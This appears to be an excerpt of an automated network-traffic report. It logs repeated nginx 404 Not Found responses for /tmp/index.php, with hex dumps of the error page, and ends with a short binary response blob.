Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:28:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:28:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:28:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:28:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:28:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:28:15 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
